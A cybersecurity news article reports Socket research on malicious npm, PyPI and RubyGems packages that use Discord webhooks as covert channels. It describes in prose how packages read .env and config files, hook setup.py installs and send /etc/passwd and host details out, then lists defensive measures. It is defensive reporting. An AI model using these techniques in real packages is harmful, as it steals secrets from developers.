Malicious Packages Turn Discord Into Covert C2 Hub Across npm, PyPI, RubyGems

Threat research from Socket has uncovered escalating abuse of Discord webhooks as covert command-and-control (C2) channels within malicious packages distributed across npm, PyPI, and RubyGems.

This technique allows threat actors to exfiltrate sensitive data to attacker-controlled Discord servers without the need for hosting dedicated infrastructure, making detection and prevention significantly more challenging.

Discord webhooks are write-only HTTPS endpoints that accept JSON payloads to post messages to specific channels. Possession of a webhook URL grants full ability to send data, while the endpoint itself does not reveal channel history.

Typical responses include 204 No Content or 200 OK with ?wait=true on success, 401 Unauthorized for invalid tokens, and 429 Too Many Requests under rate limits.

Because webhooks leverage Discord’s trusted domain over TLS, they often bypass firewall controls and blend in with legitimate traffic.

npm, PyPI, and RubyGems Exploitation Patterns

One npm example, mysql-dumpdiscord, uses Node.js to locate configuration files such as config.json, .env, and ayarlar.js (Turkish “settings”), read their contents, and POST them to a hard-coded Discord webhook.

If a file exceeds 1,900 characters, the script truncates it and appends a “file shortened” message in Turkish. This functions as a simple file exfiltration dropper, but leverages Discord instead of a traditional attacker C2.

A second npm case is a minimal wrapper around discord.js’s WebhookClient, joining arbitrary arguments into a message and silently sending them to an embedded webhook.

While sometimes used for logging, the hard-coded URL allows any data passed to be transmitted externally, making it an easy covert sink for stolen information.

In PyPI, the malinssx package overrides the install command in setup.py to send an encoded message in Vietnamese (“Someone just installed the maladicus package via pip!”) to a hard-coded webhook during installation.

This supply chain attack model silently triggers outbound HTTP requests before runtime, and identical packages (malicus, maliinn) from the same author used the same Discord endpoint.

On RubyGems, the malicious sqlcommenter_rails gem collects extensive host data username, hostname, public IP (via api.ipify.org), DNS servers from /etc/resolv.conf, and /etc/passwd contents formats it into a multi-line message, prints it locally, and sends it to a Discord webhook over TLS using Net::HTTP. Errors are silently suppressed, ensuring stealth.

Defensive Measures and Industry Impact

The low cost and stealth of webhook-based C2 flips supply chain economics in favor of attackers, reducing infrastructure overhead while exploiting trusted domains.

Socket urges enforcing strict egress controls, dependency pinning, and continuous scanning for hard-coded URLs and install-time network calls. Their GitHub App, CLI, and Firewall are designed to detect and block such malicious dependencies before execution.

As more threat actors pivot to webhook-centered exfiltration, shifting to behavioral analysis over static IOC detection becomes essential to safeguard the software supply chain.

Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates

The post Malicious Packages Turn Discord Into Covert C2 Hub Across npm, PyPI, RubyGems appeared first on Cyber Security News.